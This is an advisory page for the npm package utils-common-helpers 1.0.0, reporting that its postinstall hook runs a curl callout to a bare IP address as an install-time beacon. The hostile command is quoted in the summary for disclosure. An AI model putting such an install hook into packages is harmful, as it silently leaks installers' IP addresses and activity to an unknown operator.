utils-common-helpers @1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5911
Ecosystem
npm
Summary
package.json declares a postinstall lifecycle hook that runs curl -s http://8.140.205.78 -o /dev/null on every install. The package's only functional code is a trivial hello() helper in index.js that returns the string 'hello', which is inconsistent with the declared purpose of 'Common utility helpers for frontend projects'. The lifecycle network call has no relation to any advertised functionality and serves only to disclose the installer's public IP address and install timing to the operator of the bare IP 8.140.205.78. This is a classic install-counter / victim-discovery beacon pattern: a throwaway lure package whose real purpose is the install-time callout. Plain HTTP to a bare IP (no TLS, no domain, no documented purpose) is inconsistent with any legitimate telemetry shape.
Source: amazon-inspector (e6999f05f6036baf4f6d45de0c55c6dd63452dc59ab6ebcbad0ffebf93e60584)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.